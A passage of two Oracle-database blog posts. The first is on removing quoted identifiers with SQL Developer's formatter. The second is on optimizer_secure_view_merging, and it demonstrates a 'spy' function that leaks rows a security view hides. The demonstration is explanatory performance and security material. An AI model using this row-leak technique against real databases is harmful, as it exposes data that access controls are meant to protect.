We removed the SCHEMA node (on line 2) from the SXML document. As a result, the schema was removed in the DDL. But not completely. Two double quotes and one dot survived, which makes the DDL invalid. IMO this is a bug of the $ORACLE_HOME/rdbms/xml/xsl/kusviewd.xsl script. It’s handled correctly in the XML script. We could fix that with a replace(..., 'VIEW ""."', 'VIEW "') call. As long as the search term is not ambiguous, everything should be fine.

We also removed the COL_LIST node (line 5-21) from the SXML document. In this case the column alias list is completely removed from the DDL. Including the parentheses. Nice.

Maybe you wonder how editionable is represented in the SXML document: with a NONEDITIONABLE node, if the view is noneditionable.

How Can We Work Around the Limitations?

We’ve seen the limitations of the current dbms_metadata API and the necessity to use string manipulation functions to fix invalid DDL.

There is no way to remove double quotes from quoted identifiers with dbms_metadata. However, as Connor McDonald demonstrated in his blog post, we can remove them with some string acrobatics. Why not use a simple replace call? Because there are some rules to follow. A globally applied replace(..., '"', null) call would produce invalid code in many real-life scenarios. We need a more robust solution.
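
The following hedged example shows why. A global replace of all double quotes would corrupt the string literal and silently change the case-sensitive column alias to upper case:

select '"NOT_AN_IDENTIFIER"' as "lowerCaseAlias"
  from dual;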

Applying the rules in a code formatter can be such a robust solution.

Rules for Safely Removing Double Quotes from Quoted Identifiers

What are the rules to follow?

1. Is a SQL or PL/SQL Identifier

You have to make sure that the double quotes surround a SQL or PL/SQL identifier. Sounds logical. However, it is not that simple. Here are some examples:

create or replace procedure plsql_comment is
begin
   -- "NOT_AN_IDENTIFIER"
   /*
      "NOT_AN_IDENTIFIER"
   */
   null;
end;
/

create or replace procedure plsql_string is
   l_string1 varchar2(100 char);
   l_string2 varchar2(100 char);
begin
   l_string1 := '"NOT_AN_IDENTIFIER"';
   l_string2 := q'[
                   "NOT_AN_IDENTIFIER"
                ]';
end;
/

create or replace procedure plsql_conditional_compilation_text is
begin
   $if false $then
      Conditional compilation blocks can contain any text.
      It does not need to be valid PL/SQL.
      "NOT_AN_IDENTIFIER"
      FTLDB and tePLSQL use this construct to store code templates in such blocks.
   $end
   null;
end;
/

create or replace and resolve java source named "JavaString" as
public class JavaString {
  public static String hello() {
     return "NOT_AN_IDENTIFIER";
  }
}
/

You can solve the first three examples easily with a lexer. A lexer groups a stream of characters into tokens. Such a group of characters is called a lexer token. A lexer token knows its start and end position in the source text and has a type. The lexer in SQL Developer and SQLcl produces the following types of tokens:

  • COMMENT (/* ... */)
  • LINE_COMMENT (-- ...)
  • QUOTED_STRING ('string' or q'[string]')
  • DQUOTED_STRING ("string")
  • WS (space, tab, new line, carriage return)
  • DIGITS (0123456789 plus some special cases)
  • OPERATION (e.g. ()[]^-|!*+.><=,;:%@?/~)
  • IDENTIFIER (words)
  • MACRO_SKIP (conditional compilation tokens such as $if, $then, etc.)

We can simply focus on tokens of type DQUOTED_STRING and ignore tokens that are within conditional compilation tokens $if and $end.

Finding out whether a DQUOTED_STRING is part of a Java stored procedure is more difficult. Luckily, SQL Developer’s parser cannot deal with Java stored procedures and produces a parse error. As a result, we just have to keep the code “as is” in such cases.

2. Consists of Valid Characters

According to the PL/SQL Language Reference a nonquoted identifier must comply with the following rules:

An ordinary user-defined identifier:

  • Begins with a letter
  • Can include letters, digits, and these symbols:
    • Dollar sign ($)
    • Number sign (#)
    • Underscore (_)

What is a valid letter in this context? The SQL Language Reference defines a letter as an “alphabetic character from your database character set”. Here are some examples of valid letters and therefore valid PL/SQL variable names or SQL column names:

  • Latin letters (AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz)
  • Umlauts (ÄäËëÏïÖöÜüŸÿ)
  • German Esszett (ẞß), please note that the Oracle Database does not convert the case of an Esszett, because the uppercase Esszett has officially existed only since 2017-03-29
  • C cedilla (Çç)
  • Grave accented letters (ÀàÈèÌìÒòÙù)
  • Acute accented letters (ÁáĆćÉéÍíÓóÚúÝý)
  • Circumflex accented letters (ÂâÊêÎîÔôÛû)
  • Tilde accented letters (ÃãÑñÕõ)
  • Caron accented letters (ǍǎB̌b̌ČčĚěF̌f̌ǦǧȞȟǏǐJ̌ǰǨǩM̌m̌ŇňǑǒP̌p̌Q̌q̌ŘřŠšǓǔV̌v̌W̌w̌X̌x̌Y̌y̌ŽžǮǯ)
  • Ring accented letters (ÅåŮů)
  • Greek letters (ΑαΒβΓγΔδΕεΖζΗηΘθΙιΚκΛλΜμΝνΞξΟοΠπΡρΣσΤτΥυΦφΧχΨψΩω)
  • Common Cyrillic letters (АаБбВвГгДдЕеЁёЖжЗзИиЙйКкЛлМмНнОоПпРрСсТтУуФфХхЦцЧчШшЩщЪъЫыЬьЭэЮюЯя)
  • Hiragana letters (ぁあぃいぅうぇえぉおかがきぎくぐけげこごさざしじすずせぜそぞただちぢっつづてでとどなにぬねのはばぱひびぴふぶぷへべぺほぼぽまみむめもゃやゅゆょよらりるれろゎわゐゑをんゔゕゖゝゞゟ)

The Oracle Database throws an ORA-00911: invalid character when this rule is violated.

Cause: The identifier name started with an ASCII character other than a letter or a number. After the first character of the identifier name, ASCII characters are allowed including “$”, “#” and “_”. Identifiers enclosed in double quotation marks may contain any character other than a double quotation. Alternate quotation marks (q'#...#') cannot use spaces, tabs, or carriage returns as delimiters. For all other contexts, consult the SQL Language Reference Manual.

The cause for this error message seems to be outdated, inaccurate and wrong. Firstly, it limits letters to those contained in an ASCII character set. This limitation is not generally valid anymore. Secondly, it claims that an identifier can start with a number, which is simply wrong. Thirdly, ASCII characters and letters are used as synonyms, which is misleading.

However, there are still cases where an identifier is limited to ASCII characters or single byte characters. For example, a database name or a database link name. In the projects I know, the reduction of letters to A-Z for identifiers is not a problem. The use of accented letters in identifiers is typically an oversight. Therefore, I recommend limiting the range of letters in identifiers to A-Z.

Checking this rule is quite simple. We just have to make sure that the quoted identifier matches this regular expression: ^"[A-Z][A-Z0-9_$#]*"$. This works with any regular expression engine, unlike ^"[[:alpha:]][[:alpha:]0-9_$#]*"$.
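
Here is a small sketch of that check in SQL. The match parameter 'c' makes the comparison explicitly case-sensitive, so the same expression also covers rule 4 (upper case); the keyword check of rule 3 still has to happen separately:

select candidate,
       case
          when regexp_like(candidate, '^"[A-Z][A-Z0-9_$#]*"$', 'c') then
             'quotes removable'
          else
             'keep quotes'
       end as verdict
  from (select '"DEPTSAL"' as candidate from dual union all
        select '"DeptSal"' from dual union all
        select '"DEPT SAL"' from dual union all
        select '"1DEPTSAL"' from dual);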

3. Is Not a Reserved Word

According to the PL/SQL Language Reference and the SQL Language Reference a nonquoted identifier must not be a reserved word.

If you are working with 3rd party parsers, the list of reserved words might not match the one defined for the Oracle Database. In my case I also want to consider the reserved words defined by db* CODECOP. I’m using the following query to create a JSON array with currently 260 keywords:

select json_arrayagg(keyword order by keyword) as keywords
  from (
          -- reserved keywords in Oracle database 21.3.0.0.0 (ATP)
          select keyword
            from v$reserved_words
           where (reserved = 'Y' or res_type = 'Y' or res_attr = 'Y' or res_semi = 'Y')
             and keyword is not null
             and regexp_like(keyword, '^[A-Z][A-Z0-9_$#]*$') -- valid nonquoted identifier
          union
          -- reserved keywords in db* CODECOP's PL/SQL parser 4.2.0
          select keyword
            from json_table(
                    '["AFTER","ALL","ALLOW","ALTER","ANALYTIC","AND","ANYSCHEMA","AS","ASC","ASSOCIATE","AUTHID","AUTOMATIC",
                      "AUTONOMOUS_TRANSACTION","BEFORE","BEGIN","BETWEEN","BULK","BY","BYTE","CANONICAL","CASE",
                      "CASE-SENSITIVE","CHECK","CLUSTER","COMPOUND","CONNECT","CONNECT_BY_ROOT","CONSTANT","CONSTRAINT",
                      "CONSTRUCTOR","CORRUPT_XID","CORRUPT_XID_ALL","CREATE","CROSSEDITION","CURRENT","CUSTOMDATUM",
                      "CYCLE","DB_ROLE_CHANGE","DECLARE","DECREMENT","DEFAULTS","DEFINE","DEFINER","DETERMINISTIC",
                      "DIMENSION","DISALLOW","DISASSOCIATE","DISTINCT","DROP","EACH","EDITIONING","ELSE","ELSIF",
                      "END","EVALNAME","EXCEPTION","EXCEPTION_INIT","EXCEPTIONS","EXCLUSIVE","EXTERNAL","FETCH",
                      "FOLLOWING","FOLLOWS","FOR","FORALL","FROM","GOTO","GRANT","GROUP","HAVING","HIDE","HIER_ANCESTOR",
                      "HIER_LAG","HIER_LEAD","HIER_PARENT","IF","IGNORE","IMMUTABLE","IN","INCREMENT","INDEX","INDICATOR",
                      "INDICES","INITIALLY","INLINE","INSERT","INSTEAD","INTERSECT","INTO","INVISIBLE","IS","ISOLATION",
                      "JAVA","JSON_EXISTS","JSON_TABLE","LATERAL","LIBRARY","LIKE","LIKE2","LIKE4","LIKEC","LOCK","LOGON",
                      "MAXVALUE","MEASURES","MERGE","MINUS","MINVALUE","MULTISET","MUTABLE","NAN","NAV","NCHAR_CS","NOCOPY",
                      "NOCYCLE","NONSCHEMA","NORELY","NOT","NOVALIDATE","NOWAIT","OF","ON","ONLY","OPTION","OR","ORADATA",
                      "ORDER","ORDINALITY","OVER","OVERRIDING","PARALLEL_ENABLE","PARTITION","PASSING","PAST","PIPELINED",
                      "PIVOT","PRAGMA","PRECEDES","PRECEDING","PRESENT","PRIOR","PROCEDURE","REFERENCES","REFERENCING",
                      "REJECT","RELY","REPEAT","RESPECT","RESTRICT_REFERENCES","RESULT_CACHE","RETURNING","REVOKE",
                      "SELECT","SEQUENTIAL","SERIALIZABLE","SERIALLY_REUSABLE","SERVERERROR","SETS","SHARE","SIBLINGS",
                      "SINGLE","SOME","SQL_MACRO","SQLDATA","STANDALONE","START","SUBMULTISET","SUBPARTITION",
                      "SUPPRESSES_WARNING_6009","THE","THEN","TO","TRIGGER","UDF","UNBOUNDED","UNDER","UNION",
                      "UNIQUE","UNLIMITED","UNPIVOT","UNTIL","UPDATE","UPSERT","USING","VALUES","VARRAY","VARYING",
                      "VIEW","WHEN","WHERE","WHILE","WINDOW","WITH","XMLATTRIBUTES","XMLEXISTS","XMLFOREST",
                      "XMLNAMESPACES","XMLQUERY","XMLROOT","XMLSCHEMA","XMLSERIALIZE","XMLTABLE"]',
                    '$[*]' columns (keyword path '$')
                 )
       );

The result can be used to populate a HashSet. This allows you to check very efficiently whether an identifier is a keyword.

Of course, such a global list of keywords is a simplification. In reality, the restrictions are context-specific. However, I consider the use of keywords for identifiers in any context a bad practice. Therefore, I can live with some unnecessarily quoted identifiers.

4. Is in Upper Case

This means that the following condition must be true: quoted_identifier = upper(quoted_identifier).

This does not necessarily mean that the identifier is case-insensitive as the following examples show:

set pagesize 100
column key format A3
column value format A5
set null "(-)"

-- OK, KEY/VALUE are clearly case-sensitive
select j.pair."KEY", j.pair."VALUE"
  from json_table('[{KEY:1, VALUE:"One"},{KEY:2, VALUE:"Two"}]',
          '$[*]' columns (pair varchar2(100) format json path '$')) j;

KEY VALUE
--- -----
1   One  
2   Two  

-- OK, KEY/VALUE are case-sensitive, but you have to "know" that
select j.pair.KEY, j.pair.VALUE
  from json_table('[{KEY:1, VALUE:"One"},{KEY:2, VALUE:"Two"}]',
          '$[*]' columns (pair varchar2(100) format json path '$')) j;

KEY VALUE
--- -----
1   One  
2   Two  
          
-- Oops, no error, but the result is wrong (all NULLs)
-- This is why you should not let the formatter change the case of your identifiers!
select j.pair.key, j.pair.value
  from json_table('[{KEY:1, VALUE:"One"},{KEY:2, VALUE:"Two"}]',
          '$[*]' columns (pair varchar2(100) format json path '$')) j;

KEY VALUE
--- -----
(-) (-)  
(-) (-)

You can check this rule in combination with the previous rule by using a case-sensitive regular expression match, which is the default.

5. Is Not Part of a Code Section for Which the Formatter Is Disabled

When you use a formatter there are some code sections that you do not want the formatter to change. Therefore we want to honor the marker comments that disable and enable the formatter.

Here is an example:

create or replace procedure disable_enable_formatter is
   l_dummy sys.dual.dummy%type;
begin
   -- @formatter:off
   select decode(dummy, 'X', 1 
                      , 'Y', 2
                      , 'Z', 3
                           , 0) "DECODE_RESULT" /* @formatter:on */
     into "L_DUMMY"
     from "SYS"."DUAL";

   select "DUMMY" -- noformat start
     into "L_DUMMY"
     from "SYS"."DUAL" -- noformat end
    where "DUMMY" is not null;
end;
/

After calling the formatter we expect the following output (when changing identifier case to lower is enabled):

create or replace procedure disable_enable_formatter is
   l_dummy sys.dual.dummy%type;
begin
   -- @formatter:off
   select decode(dummy, 'X', 1 
                      , 'Y', 2
                      , 'Z', 3
                           , 0) "DECODE_RESULT" /* @formatter:on */
     into l_dummy
     from sys.dual;

   select dummy -- noformat start
     into "L_DUMMY"
     from "SYS"."DUAL" -- noformat end
    where dummy is not null;
end;
/

To check this we can reuse the approach for quoted identifiers in conditional compilation text.

Removing Double Quotes from Quoted Identifiers with Arbori

As mentioned at the beginning of the post, the current version of the PL/SQL & SQL Formatter Settings can safely remove double quotes from PL/SQL and SQL code.

Here are simplified formatter settings which can be imported into SQL Developer 22.2.1. The formatter with these settings only removes the double quotes from identifiers in a safe way and leaves your code “as is”. You can download these settings from this Gist.

<options>
    <adjustCaseOnly>false</adjustCaseOnly>
    <singleLineComments>oracle.dbtools.app.Format.InlineComments.CommentsUnchanged</singleLineComments>
    <maxCharLineSize>120000</maxCharLineSize>
    <idCase>oracle.dbtools.app.Format.Case.NoCaseChange</idCase>
    <kwCase>oracle.dbtools.app.Format.Case.lower</kwCase>
    <formatWhenSyntaxError>false</formatWhenSyntaxError>
</options>

Firstly, the option adjustCaseOnly ensures that the Arbori program is fully applied.

Secondly, the option singleLineComments ensures that the whitespace before single-line comments is kept “as is”.

Thirdly, the maxCharLineSize ensures that no line breaks are added. The value of 120000 seems ridiculously high. However, I’ve seen single lines of around a hundred thousand characters in the wild.

Fourthly, the option idCase ensures that the case of nonquoted identifiers is not changed. This is important for JSON dot notation.

Fifthly, the option kwCase ensures that the case of keywords is also kept “as is”.

And finally, the option formatWhenSyntaxError ensures that the formatter does not change code that it does not understand. This is important to keep Java strings intact.

The values of all other options are irrelevant for this Arbori program.

-- --------------------------------------------------------------------------------------------------------------------
-- Minimal Arbori program (expected by the formatter, also expected: "order_by_clause___0").
-- --------------------------------------------------------------------------------------------------------------------
include "std.arbori"
dummy: :indentConditions & [node) identifier;
skipWhiteSpaceBeforeNode: runOnce -> { var doNotCallCallbackFunction;}
dontFormatNode: [node) numeric_literal | [node) path ->;

-- --------------------------------------------------------------------------------------------------------------------
-- Keep existing whitespace.
-- --------------------------------------------------------------------------------------------------------------------

keep_significant_whitespace:
    runOnce
-> {
    var LexerToken = Java.type('oracle.dbtools.parser.LexerToken');
    var tokens = LexerToken.parse(target.input, true);  // include hidden tokens
    var hiddenTokenCount = 0;
    var wsBefore = "";
    var Token = Java.type('oracle.dbtools.parser.Token');
    for (var i in tokens) {
        var type = tokens[i].type;
        if (type == Token.LINE_COMMENT || type == Token.COMMENT || type == Token.WS ||
            type == Token.MACRO_SKIP || type == Token.SQLPLUSLINECONTINUE_SKIP)
        {
            hiddenTokenCount++;
            if (type == Token.WS) {
                wsBefore += tokens[i].content;
            } else {
                wsBefore = "";
            }
        } else {
            if (i-hiddenTokenCount == 0 && hiddenTokenCount == wsBefore.length) {
                struct.putNewline(0, "");
            } else if (wsBefore != " ") {
                struct.putNewline(i-hiddenTokenCount, wsBefore);
            }
            wsBefore = "";
        }
    }
}

-- --------------------------------------------------------------------------------------------------------------------
-- Enforce nonquoted identifiers.
-- --------------------------------------------------------------------------------------------------------------------

enforce_nonquoted_identifiers:
    runOnce
-> {
    var offOnRanges = [];

    var populateOffOnRanges = function(tokens) {
        var off = -1;
        for (var i in tokens) {
            var type = tokens[i].type;
            if (type == Token.LINE_COMMENT || type == Token.COMMENT) {
                if (tokens[i].content.toLowerCase().indexOf("@formatter:off") != -1 
                    || tokens[i].content.toLowerCase().indexOf("noformat start") != -1)
                {
                    off = tokens[i].begin;
                }
                if (off != -1) {
                    if (tokens[i].content.toLowerCase().indexOf("@formatter:on") != -1
                        || tokens[i].content.toLowerCase().indexOf("noformat end") != -1)
                    {
                        offOnRanges.push([off, tokens[i].end]);
                        off = -1;
                    }
                }
            }
        }
    }

    var inOffOnRange = function(pos) {
        for (var x in offOnRanges) {
            if (pos >= offOnRanges[x][0] && pos < offOnRanges[x][1]) {
                return true;
            }
        }
        return false;
    }

    var HashSet = Java.type('java.util.HashSet');
    var Arrays = Java.type('java.util.Arrays');
    var reservedKeywords = new HashSet(Arrays.asList("ACCESS","ADD","AFTER","ALL","ALLOW","ALTER","ANALYTIC","AND",
        "ANY","ANYSCHEMA","AS","ASC","ASSOCIATE","AUDIT","AUTHID","AUTOMATIC","AUTONOMOUS_TRANSACTION","BEFORE",
        "BEGIN","BETWEEN","BULK","BY","BYTE","CANONICAL","CASE","CASE-SENSITIVE","CHAR","CHECK","CLUSTER","COLUMN",
        "COLUMN_VALUE","COMMENT","COMPOUND","COMPRESS","CONNECT","CONNECT_BY_ROOT","CONSTANT","CONSTRAINT",
        "CONSTRUCTOR","CORRUPT_XID","CORRUPT_XID_ALL","CREATE","CROSSEDITION","CURRENT","CUSTOMDATUM","CYCLE",
        "DATE","DB_ROLE_CHANGE","DECIMAL","DECLARE","DECREMENT","DEFAULT","DEFAULTS","DEFINE","DEFINER","DELETE",
        "DESC","DETERMINISTIC","DIMENSION","DISALLOW","DISASSOCIATE","DISTINCT","DROP","EACH","EDITIONING","ELSE",
        "ELSIF","END","EVALNAME","EXCEPT","EXCEPTION","EXCEPTIONS","EXCEPTION_INIT","EXCLUSIVE","EXISTS","EXTERNAL",
        "FETCH","FILE","FLOAT","FOLLOWING","FOLLOWS","FOR","FORALL","FROM","GOTO","GRANT","GROUP","HAVING","HIDE",
        "HIER_ANCESTOR","HIER_LAG","HIER_LEAD","HIER_PARENT","IDENTIFIED","IF","IGNORE","IMMEDIATE","IMMUTABLE",
        "IN","INCREMENT","INDEX","INDICATOR","INDICES","INITIAL","INITIALLY","INLINE","INSERT","INSTEAD","INTEGER",
        "INTERSECT","INTO","INVISIBLE","IS","ISOLATION","JAVA","JSON_EXISTS","JSON_TABLE","LATERAL","LEVEL","LIBRARY",
        "LIKE","LIKE2","LIKE4","LIKEC","LOCK","LOGON","LONG","MAXEXTENTS","MAXVALUE","MEASURES","MERGE","MINUS",
        "MINVALUE","MLSLABEL","MODE","MODIFY","MULTISET","MUTABLE","NAN","NAV","NCHAR_CS","NESTED_TABLE_ID","NOAUDIT",
        "NOCOMPRESS","NOCOPY","NOCYCLE","NONSCHEMA","NORELY","NOT","NOVALIDATE","NOWAIT","NULL","NUMBER","OF",
        "OFFLINE","ON","ONLINE","ONLY","OPTION","OR","ORADATA","ORDER","ORDINALITY","OVER","OVERRIDING",
        "PARALLEL_ENABLE","PARTITION","PASSING","PAST","PCTFREE","PIPELINED","PIVOT","PRAGMA","PRECEDES",
        "PRECEDING","PRESENT","PRIOR","PROCEDURE","PUBLIC","RAW","REFERENCES","REFERENCING","REJECT","RELY",
        "RENAME","REPEAT","RESOURCE","RESPECT","RESTRICT_REFERENCES","RESULT_CACHE","RETURNING","REVOKE","ROW",
        "ROWID","ROWNUM","ROWS","SELECT","SEQUENTIAL","SERIALIZABLE","SERIALLY_REUSABLE","SERVERERROR","SESSION",
        "SET","SETS","SHARE","SIBLINGS","SINGLE","SIZE","SMALLINT","SOME","SQLDATA","SQL_MACRO","STANDALONE",
        "START","SUBMULTISET","SUBPARTITION","SUCCESSFUL","SUPPRESSES_WARNING_6009","SYNONYM","SYSDATE","TABLE",
        "THE","THEN","TO","TRIGGER","UDF","UID","UNBOUNDED","UNDER","UNION","UNIQUE","UNLIMITED","UNPIVOT","UNTIL",
        "UPDATE","UPSERT","USER","USING","VALIDATE","VALUES","VARCHAR","VARCHAR2","VARRAY","VARYING","VIEW",
        "WHEN","WHENEVER","WHERE","WHILE","WINDOW","WITH","XMLATTRIBUTES","XMLEXISTS","XMLFOREST","XMLNAMESPACES",
        "XMLQUERY","XMLROOT","XMLSCHEMA","XMLSERIALIZE","XMLTABLE"));

    var isKeyword = function(token) {
        return reservedKeywords.contains(token.content.replace('"', ""));
    }

    var isUnquotingAllowed = function(token) {
        var Pattern = Java.type("java.util.regex.Pattern");
        if (!Pattern.matches('^"[A-Z][A-Z0-9_$#]*"$', token.content)) {
            return false;
        }
        if (isKeyword(token)) {
            return false;
        }
        return true;
    }

    var findAndConvertQuotedIdentifiers = function() {
        var tokens = LexerToken.parse(target.input,true);  // include hidden tokens
        populateOffOnRanges(tokens);
        var StringBuilder = Java.type('java.lang.StringBuilder');
        var newInput = new StringBuilder(target.input);
        var delpos = [];
        var conditionalBlock = false;
        for (var i in tokens) {
            var type = tokens[i].type;
            if (type == Token.MACRO_SKIP) {
                var content = tokens[i].content.toLowerCase();
                if (content.indexOf("$if ") == 0) {
                    conditionalBlock = true;
                } else if (content.indexOf("$end") == 0) {
                    conditionalBlock = false;
                }
            }
            if (type == Token.DQUOTED_STRING && isUnquotingAllowed(tokens[i]) 
                && !inOffOnRange(tokens[i].begin) && !conditionalBlock) 
            {
                delpos.push(tokens[i].begin);
                delpos.push(tokens[i].end-1);
            }
        }
        var i = delpos.length - 1;
        while (i >= 0) {
            newInput.deleteCharAt(delpos[i]);
            i--;
        }
        target.input = newInput.toString();
    }

    var updateParseTreeAndTokenList = function() {
        var Parsed = Java.type('oracle.dbtools.parser.Parsed');
        var SqlEarley = Java.type('oracle.dbtools.parser.plsql.SqlEarley')
        var defaultTokens = LexerToken.parse(target.input);
        var newTarget = new Parsed(target.input, defaultTokens, SqlEarley.getInstance(), 
            Java.to(["sql_statements"], "java.lang.String[]"));            
        target.src.clear();
        target.src.addAll(newTarget.src);
    }

    // main
    findAndConvertQuotedIdentifiers();
    updateParseTreeAndTokenList();
}

-- --------------------------------------------------------------------------------------------------------------------
-- Define identifiers (relevant for keyword case and identifier case)
-- --------------------------------------------------------------------------------------------------------------------

analytics: [identifier) identifier & [call) analytic_function & [call = [identifier;
ids: [identifier) identifier;
identifiers: ids - analytics ->;

Firstly, the lines 1 to 8 are required by the formatter. They are not interesting in this context.

Secondly, the lines 9 to 42 are the heart of a lightweight formatter. This code ensures that all whitespace between all tokens is kept. Therefore, the existing format of the code remains untouched. Read this blog post to learn how SQL Developer’s formatter works.

Thirdly, the lines 43 to 173 remove unnecessary double quotes from identifiers. We store the positions of the double quotes to be removed on lines 147 and 148 in an array named delpos while processing all tokens from start to end. The removal of the double quotes happens on line 153 while processing delpos entries from end to start.

And finally, the lines 174-180 define an Arbori query named identifiers. The formatter uses this query to divide lexer tokens of type IDENTIFIER into keywords and identifiers. This is important to ensure that the case of identifiers is left “as is” regardless of the configuration of kwCase.

Doesn’t Connor’s PL/SQL Function Do the Same?

No, when you look closely at the ddl_cleanup.sql script as of 2022-03-02, you will find out that the ddl function has the following limitations:

  • Quoted identifiers are not ignored in
    • Single and multi-line comments
    • Conditional compilation text
    • Code sections for which the formatter is disabled
  • Java Strings are treated as quoted identifiers
  • Reserved keywords are not considered
  • Nonquoted identifiers are changed to lower case, which might break code using JSON dot notation

It just shows that things become complicated when you don’t solve them in the right place. In this case that place is dbms_metadata’s XSLT scripts. dbms_metadata knows what an identifier is. It can safely skip the enquoting process if the identifier is in upper case, matches the regular expression ^[A-Z][A-Z0-9_$#]*$ and is not a reserved keyword. That’s all. The logic can be implemented in a single XSL template. We API users, on the other hand, must parse the code to somehow identify quoted identifiers and their context before we can decide how to proceed.
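
As a sketch of how simple that decision is, here is the described logic expressed in SQL. The function name needs_quotes is made up for this example, and it assumes select access to v$reserved_words:

with
   function needs_quotes(in_id in varchar2) return varchar2 is
      l_reserved integer;
   begin
      -- rule 3: reserved words must stay quoted
      select count(*)
        into l_reserved
        from v$reserved_words
       where keyword = in_id;
      -- rules 2 and 4: valid characters, upper case (case-sensitive match)
      if l_reserved = 0 and regexp_like(in_id, '^[A-Z][A-Z0-9_$#]*$', 'c') then
         return 'no';
      else
         return 'yes';
      end if;
   end;
select column_value as id, needs_quotes(column_value) as needs_quotes
  from table(sys.odcivarchar2list('DEPTSAL', 'DeptSal', 'SELECT', 'DEPT SAL'))
/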

Formatting DDL Automatically

You can configure SQL Developer to automatically format DDL with your current formatter settings. For that you have to enable the option Autoformat Dictionary Objects SQL as in the screenshot below:

Autoformat DDL

Here’s the result for the deptsal view using the PL/SQL & SQL Formatter Settings:

Autoformat in Action

The identifiers in upper case were originally quoted identifiers. By default, we configure the formatter to keep the case of identifiers. This ensures that code using JSON dot notation is not affected by a formatting operation.

Processing Many Files

SQL Developer is not suited to format many files. However, you can use the SQLcl script or the standalone formatter to format files in a directory tree. The formatter settings (path to the .xml and .arbori file) can be passed as parameters. I recommend using the standalone formatter. It uses the up-to-date and much faster JavaScript engine from GraalVM. Furthermore, the standalone formatter also works with JDK 17, which no longer contains a JavaScript engine.

You can download the latest tvdformat.jar from here. Run java -jar tvdformat.jar to show all command line options.
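
For example, formatting a directory tree with custom settings could look like the following. The xml= and arbori= parameter names are assumptions based on my memory of the usage help, so please verify them against the output of the command above:

java -jar tvdformat.jar /path/to/code xml=my_settings.xml arbori=my_settings.arbori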

Summary

If your code base contains generated code, then it probably also contains unnecessarily quoted identifiers. Especially if dbms_metadata was used to extract DDL statements. Removing these double quotes without breaking some code is not that easy. However, SQL Developer’s highly configurable formatter can do the job, even without actually formatting the code.

I hope that some of the shortcomings of dbms_metadata will be addressed in an upcoming release of the Oracle Database. Supporting nonquoted identifiers as an additional non-default option should be easy and not so risky to implement.

Anyway, instead of just detecting violations of G-2180: Never use quoted identifiers, it is a good idea to be able to correct them automatically.

Please open a GitHub issue if you encounter a bug in the formatter settings. Thank you.

The post Quoted Identifiers #JoelKallmanDay appeared first on Philipp Salvisberg's Blog.

optimizer_secure_view_merging and plsql_declarations


The Original Problem

A customer is currently upgrading some Oracle databases from 11.2 to 19c. One query was extremely slow on the new test system and my job was to find out why. The root cause was that the database parameter optimizer_secure_view_merging was set to a different value: true in 19c and false in 11.2. This led to a different and in fact bad execution plan in 19c.
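
A quick way to compare such settings between two systems is to query v$parameter on both sides; isdefault shows whether the value differs from the default:

select name, value, isdefault
  from v$parameter
 where name = 'optimizer_secure_view_merging';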

Now the question was, should the customer keep the default value of optimizer_secure_view_merging in 19c and rewrite the slow query or change the parameter to false as in 11.2 to get the good performance without a code change?

What About the opt_param Hint?

Actually, the first thing I tried was the opt_param('optimizer_secure_view_merging','false') hint. Unfortunately, this does not work in 19c. It’s a known bug 28504113. Fixed in 23c. However, I can’t really recommend waiting for 23c, right?
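
For reference, this is how the hint would be used. Due to the bug it has no effect on the view merging behavior in 19c (table and column names are placeholders):

select /*+ opt_param('optimizer_secure_view_merging', 'false') */ *
  from some_view
 where some_column = 42;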

What About the merge view Privilege?

The merge any view privilege is a good option for highly privileged users and roles. But it should not be granted lightly to any ordinary role or user.

The merge view privilege can be granted per view to a user or role. This has a similar scope as a hint in the subquery of a view without having to change the code. In fact, it is an excellent option to override the optimizer_secure_view_merging setting for a view. We could grant merge view on <owner>.<view_name> to public to mimic the scope of a hint in the subquery of a view.
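
Here is a hedged example with made-up owner and view names:

-- allows merging of app_owner.sales_v for everybody,
-- mimicking the scope of a hint in the view's subquery
grant merge view on app_owner.sales_v to public;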

However, the customer uses a metadata-driven approach to generate the grants for end user roles as part of the application. And it would require a change of the application to handle this exceptional case. Of course, this grant can easily be hard-coded for the view in question, but this is something the customer would like to avoid.

Christian Antognini’s Recommendation

Chris explains optimizer_secure_view_merging on pages 289 to 291 in Troubleshooting Oracle Performance, 2nd Edition. On page 291 he writes the following:

If you’re neither using views nor VPD for security purposes, I advise you to set the optimizer_secure_view_merging initialization parameter to FALSE.

In my case, the customer uses views and protects them with Virtual Private Database policies. According to Chris, the customer should keep the default value true for optimizer_secure_view_merging. Sound advice.

What Security Risk Are We Talking About?

Troubleshooting Oracle Performance, 2nd Edition comes with an allfiles.zip file. It contains a script optimizer_secure_view_merging.sql in the folder chapter09. Chris used this script to explain the impact of optimizer_secure_view_merging in his book. I reuse this script here with minor changes.

Let’s connect as user sys and create a database user u1 for the application data and code and a user u2 as connect user (with passwords which work in Autonomous Databases). We also disable optimizer_secure_view_merging.

create user u1 identified by "AppOwner2022"    default tablespace users quota unlimited on users;
create user u2 identified by "ConnectUser2022" default tablespace users quota unlimited on users;

grant create session, create table, create procedure, create view, create public synonym to u1;
grant create session, create procedure to u2;

alter system set optimizer_secure_view_merging=false scope=memory;

Now we connect as user u1 and create a table t with 6 rows, a function f, and a view v that uses f to filter rows.

create table t (
  id    number(10) primary key,
  class number(10),
  pad   varchar2(10)
);

execute dbms_random.seed(0)

insert into t (id, class, pad)
select rownum, mod(rownum, 3), dbms_random.string('a', 10)
  from dual
connect by level <= 6;

execute dbms_stats.gather_table_stats(user, 't')

create or replace function f(in_class in number) return number as
begin
   if in_class = 1 then
      return 1;
   else
      return 0;
   end if;
end;
/

create or replace view v as
   select *
     from t
    where f(class) = 1;

grant select on v to u2;

create or replace public synonym v for u1.v;

Let’s connect as user u2 to query the view.

select id, pad
  from v
 where id between 1 and 5;

        ID PAD       
---------- ----------
         1 DrMLTDXxxq
         4 AszBGEUGEL

Only two of five rows are returned due to the where clause in the view. So far so good.

The user u2 has the right to create its own functions. And that is a security risk. Why? Because the user can write a spy function like in the next example:

create or replace function spy(
   in_id  in number,
   in_pad in varchar2
) return number as
begin
   dbms_output.put_line('id='
      || in_id
      || ' pad='
      || in_pad);
   return 1;
end;
/

set serveroutput on size unlimited
select id, pad
  from v
 where id between 1 and 5
   and spy(id, pad) = 1;

        ID PAD       
---------- ----------
         1 DrMLTDXxxq
         4 AszBGEUGEL

id=1 pad=DrMLTDXxxq
id=2 pad=XOZnqYRJwI
id=3 pad=nlGfGBTxNk
id=4 pad=AszBGEUGEL
id=5 pad=qTSRnFjRGb

Look at the server output for id 2, 3 and 5. By using the spy function in the where clause the user can get access to all rows in table t. This is only possible because

